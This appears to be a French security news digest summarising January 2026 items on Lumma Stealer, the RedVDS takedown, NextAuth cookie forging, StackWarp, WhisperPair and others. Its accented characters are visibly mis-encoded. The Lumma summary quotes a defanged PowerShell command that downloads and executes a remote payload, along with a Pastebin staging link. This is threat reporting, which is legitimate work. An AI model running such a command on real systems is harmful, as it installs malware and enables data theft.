Lumma Stealer multiplie les tùches planifiées et accroßt le trafic C2 vers fileless-market[.]cc

Source: billet signĂ© par Brad Duncan (publiĂ© le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer prĂ©sentant un comportement post-infection inhabituel qui gĂ©nĂšre une hausse continue de trafic vers un mĂȘme domaine C2. AprĂšs l’exfiltration des donnĂ©es par Lumma Stealer, l’hĂŽte Windows infectĂ© rĂ©cupĂšre des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisĂ©es pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraĂźnant des requĂȘtes HTTPS rĂ©pĂ©tĂ©es vers hxxps[:]//fileless-market[.]cc/. ...

16 janvier 2026 Â· 2 min

Microsoft dĂ©mantĂšle RedVDS, un service de bureaux virtuels au cƓur de campagnes cybercriminelles

Source : BleepingComputer — Microsoft a annoncĂ© avoir perturbĂ© RedVDS, une plateforme cybercriminelle de « virtual desktop » (VDS) opĂ©rant depuis 2019, via des actions civiles aux États‑Unis et au Royaume‑Uni et une opĂ©ration internationale conduite avec Europol et les autoritĂ©s allemandes. RedVDS fonctionnait comme un Cybercrime-as-a-Service vendant des serveurs Windows en cloud avec droits administrateur et sans limites d’usage pour environ 24 $/mois. La plateforme a Ă©tĂ© utilisĂ©e par plusieurs groupes de menace, dont Storm‑0259, Storm‑2227, Storm‑1575 et Storm‑1747, et son dĂ©veloppeur/opĂ©rateur est suivi comme Storm‑2470. Microsoft a saisi l’infrastructure, mettant hors ligne le marketplace et le portail client. Deux co‑demandeurs se sont joints Ă  l’action : H2‑Pharma (perte de 7,3 M$ via BEC) et l’association Gatehouse Dock Condominium en Floride (prĂšs de 500 000 $). ...

16 janvier 2026 Â· 3 min

Microsoft et les forces de l’ordre dĂ©mantĂšlent RedVDS, service de cybercriminalitĂ© Ă  l’abonnement

Source: Microsoft (Digital Crimes Unit) — Microsoft annonce une action juridique coordonnĂ©e aux États-Unis et, pour la premiĂšre fois, au Royaume‑Uni, appuyĂ©e par des autoritĂ©s allemandes et Europol, pour perturber RedVDS, un service d’abonnement fournissant des ordinateurs virtuels jetables utilisĂ©s dans des fraudes massives. L’opĂ©ration a permis la saisie d’infrastructures clĂ©s et la mise hors ligne de la place de marchĂ© RedVDS. RedVDS s’inscrit dans l’écosystĂšme cybercrime-as-a-service en offrant, dĂšs 24 USD par mois, des machines virtuelles discrĂštes et Ă©phĂ©mĂšres fonctionnant avec des logiciels non licenciĂ©s, dont Windows. Ce service a Ă©tĂ© massivement exploitĂ© pour envoyer des campagnes de phishing Ă  haut volume, hĂ©berger de l’infrastructure de scam, et faciliter des fraudes assistĂ©es par IA gĂ©nĂ©rative (face swap, manipulation vidĂ©o, clonage de voix). En un mois, plus de 2 600 VM RedVDS ont expĂ©diĂ© en moyenne 1 million d’e‑mails de phishing par jour vers des clients Microsoft (sur les 600 millions d’attaques bloquĂ©es quotidiennement), contribuant depuis septembre 2025 Ă  plus de 191 000 compromissions ou accĂšs frauduleux d’organisations. ...

16 janvier 2026 Â· 3 min

Moxie Marlinspike lance Confer, un assistant IA chiffré de bout en bout via TEE

Selon l’extrait d’actualitĂ© du 16 janvier 2026, Moxie Marlinspike (crĂ©ateur de Signal) lance Confer, un assistant IA privĂ© et open source misant sur le chiffrement de bout en bout et un environnement d’exĂ©cution de confiance (TEE) pour protĂ©ger les conversations. Le contexte Ă©voque les risques de stockage centralisĂ© des chatbots grand public et rappelle une ordonnance de juin 2025 imposant Ă  OpenAI de conserver indĂ©finiment les conversations de ChatGPT, alimentant la dĂ©fiance. Le billet de blog de Confer et des Ă©changes avec Ars Technica sont citĂ©s. ...

16 janvier 2026 Â· 2 min

Next.js/NextAuth : forger des cookies d’authentification via le NEXTAUTH_SECRET

Dans un billet technique publiĂ© le 14 janvier 2026, l’auteur dĂ©taille une mĂ©thode permettant Ă  un adversaire de forger des cookies d’authentification pour des applications Next.js utilisant NextAuth/Auth.js, en s’appuyant sur la vulnĂ©rabilitĂ© React2Shell (CVE-2025-55182). Le contexte dĂ©crit que l’exploitation de React2Shell peut laisser trĂšs peu de traces et permettre Ă  un attaquant d’exfiltrer des variables d’environnement, notamment des identifiants OAuth et surtout le secret d’application de NextAuth (NEXTAUTH_SECRET/AUTH_SECRET). L’article souligne que la rotation des seuls secrets OAuth est insuffisante : le secret NextAuth est la clĂ© pour chiffrer et authentifier les cookies de session. ...

16 janvier 2026 Â· 2 min

Pays-Bas: 7 ans de prison pour un hacker ayant infiltré les ports de Rotterdam et Anvers

Selon BleepingComputer, la Cour d’appel d’Amsterdam a confirmĂ© la condamnation d’un homme de 44 ans Ă  7 ans de prison pour piratage informatique, facilitation d’importation de drogue (210 kg de cocaĂŻne), et tentative d’extorsion, tout en le relaxant d’un chef liĂ© Ă  une tentative d’importation de 5 000 kg. Son appel, fondĂ© sur la contestation de l’interception de communications chiffrĂ©es via Sky ECC, a Ă©tĂ© rejetĂ©. đŸ§‘â€đŸ’» Modus operandi: l’individu a compromis les serveurs des ports de Rotterdam, Barendrecht et Anvers (Pays-Bas/Belgique) en s’appuyant sur des employĂ©s qui insĂ©raient des clĂ©s USB infectĂ©es. Cela lui a permis d’implanter un outil d’accĂšs Ă  distance (RAT) dans les systĂšmes internes, d’exfiltrer des donnĂ©es de bases de donnĂ©es et d’intercepter des donnĂ©es en transit. ...

16 janvier 2026 Â· 2 min

Quishing via QR codes stylisés : Deakin University propose ALFA pour bloquer les scans malveillants

Selon Help Net Security (15 janvier 2026), des chercheurs de Deakin University ont Ă©tudiĂ© l’usage de QR codes stylisĂ©s (couleurs, formes, logos, images de fond) dans les attaques de quishing et prĂ©sentent une mĂ©thode de dĂ©tection centrĂ©e sur la structure du code plutĂŽt que sur l’URL embarquĂ©e. Les QR codes masquent leur destination jusqu’au scan, ce qui contourne les passerelles e-mail qui inspectent les URL en clair. Les versions « fancy » brouillent en plus les repĂšres visuels (modules arrondis/Ă©tirĂ©s, recolorĂ©s, logos centraux, arriĂšre-plans), conservant une scannabilitĂ© Ă©levĂ©e tout en perturbant les outils de dĂ©tection existants. ...

16 janvier 2026 Â· 3 min

StackWarp : une faille AMD sur Zen compromet l’intĂ©gritĂ© des VMs SEV‑SNP

The Register rapporte que des chercheurs du CISPA (Allemagne) ont prĂ©sentĂ© « StackWarp » (CVE-2025-29943), une vulnĂ©rabilitĂ© des CPU AMD Zen affectant les environnements de virtualisation sĂ©curisĂ©e SEV‑SNP. AMD a publiĂ© des correctifs en juillet 2025 et un bulletin de sĂ©curitĂ© classant le problĂšme « faible sĂ©vĂ©ritĂ© », avec nĂ©cessitĂ© de mises Ă  jour firmware par les OEM. đŸ§Ș Les chercheurs dĂ©crivent une faille de la microarchitecture (stack engine) qui permet, en dĂ©synchronisant la gestion du pointeur de pile, de « geler » le delta de pile lors de certaines opĂ©rations. En basculant un bit de contrĂŽle non documentĂ© (bit 19 du MSR 0xC0011029) cĂŽtĂ© hyperviseur, un attaquant peut manipuler le pointeur de pile d’un invitĂ© protĂ©gĂ©. ...

16 janvier 2026 Â· 2 min

UAT-8837 (nexus chinois) cible l’infrastructure critique nord-amĂ©ricaine et exploite un zero‑day Sitecore

Selon Cisco Talos (Threat Spotlight du 15 janv. 2026), le groupe UAT‑8837 est Ă©valuĂ© avec une confiance moyenne comme un acteur APT Ă  nexus chinois, principalement orientĂ© vers l’obtention d’accĂšs initial Ă  des organisations de grande valeur. Depuis au moins 2025, ses cibles se concentrent sur les secteurs d’infrastructure critique en AmĂ©rique du Nord. AprĂšs compromission, l’acteur dĂ©ploie surtout des outils open source pour collecter des identifiants, configurations de sĂ©curitĂ© et informations de domaine/AD, multipliant les canaux d’accĂšs. Les TTPs et l’infrastructure observĂ©es recoupent l’exploitation rĂ©cente de CVE‑2025‑53690 (zero‑day de dĂ©sĂ©rialisation ViewState dans les produits Sitecore), laissant penser qu’UAT‑8837 dispose d’exploits zero‑day. ...

16 janvier 2026 Â· 3 min

WhisperPair (CVE-2025-36911) : une faille Fast Pair permet le dĂ©tournement et l’espionnage d’appareils audio Bluetooth

Selon BleepingComputer (Sergiu Gatlan), des chercheurs de KU Leuven ont dĂ©voilĂ© une vulnĂ©rabilitĂ© critique, baptisĂ©e WhisperPair (CVE-2025-36911), dans le protocole Fast Pair de Google. Elle touche des centaines de millions de casques, Ă©couteurs et enceintes Bluetooth, indĂ©pendamment du systĂšme d’exploitation du smartphone, car la faille rĂ©side dans les accessoires eux‑mĂȘmes. Le problĂšme provient d’implĂ©mentations incorrectes du protocole Fast Pair : bien que la spĂ©cification exige qu’un accessoire ignore les requĂȘtes d’appairage hors « mode appairage », de nombreux produits ne font pas ce contrĂŽle. Un attaquant peut ainsi initier la procĂ©dure Fast Pair, obtenir une rĂ©ponse du pĂ©riphĂ©rique vulnĂ©rable, puis terminer l’opĂ©ration via un appairage Bluetooth classique — le tout sans consentement de l’utilisateur. ...

16 janvier 2026 Â· 2 min
Derniùre mise à jour le: 6 juillet 2026 📝